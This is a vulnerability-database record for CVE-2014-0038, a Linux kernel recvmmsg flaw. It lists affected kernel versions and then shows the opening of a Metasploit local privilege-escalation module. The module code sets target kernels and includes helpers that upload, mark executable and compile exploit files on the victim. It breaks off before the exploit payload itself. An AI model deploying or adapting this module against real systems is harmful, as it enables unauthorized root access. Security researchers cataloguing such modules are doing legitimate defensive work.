"cpe:/o:linux:linux_kernel:3.10.22", "cpe:/o:linux:linux_kernel:3.10.19", "cpe:/o:linux:linux_kernel:3.12.10", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.12.1", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.9.5"], "id": "CVE-2014-0038", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0038", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.3:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2022-06-24T09:48:33", "description": "This module attempts to exploit CVE-2014-0038, by sending a recvmmsg system call with a crafted timeout pointer parameter to gain root. This exploit has offsets for 3 Ubuntu 13 kernels: 3.8.0-19-generic (13.04 default); 3.11.0-12-generic (13.10 default); 3.11.0-15-generic (13.10). This exploit may take up to 13 minutes to run due to a decrementing (1/sec) pointer which starts at 0xff*3 (765 seconds)\n", "cvss3": {}, "published": "2016-10-09T03:58:09", "type": "metasploit", "title": "Linux Kernel recvmmsg Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2021-02-02T10:15:46", "id": "MSF:EXPLOIT-LINUX-LOCAL-RECVMMSG_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/recvmmsg_priv_esc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux Kernel recvmmsg Privilege Escalation',\n 'Description' => %q{\n This module attempts to exploit CVE-2014-0038, by sending a recvmmsg\n system call with a crafted timeout pointer parameter to gain root.\n\n This exploit has offsets for 3 Ubuntu 13 kernels:\n 3.8.0-19-generic (13.04 default);\n 3.11.0-12-generic (13.10 default);\n 3.11.0-15-generic (13.10).\n\n This exploit may take up to 13 minutes to run due to a decrementing\n (1/sec) pointer which starts at 0xff*3 (765 seconds)\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die <mike@shorebreaksecurity.com>', # Metasploit module\n 'rebel' # Discovery and exploit\n ],\n 'DisclosureDate' => '2014-02-02',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true },\n 'References' =>\n [\n [ 'BID', '65255' ],\n [ 'CVE', '2014-0038' ],\n [ 'EDB', '31347' ],\n [ 'EDB', '31346' ],\n [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900' ]\n ],\n 'DefaultTarget' => 0))\n register_options [\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ])\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n write_file path, data\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n cmd_exec \"chmod +x '#{path}'\"\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n\n output = cmd_exec gcc_cmd\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n cmd_exec \"chmod +x #{path}\"\n end\n\n def strip_comments(c_code)\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\n 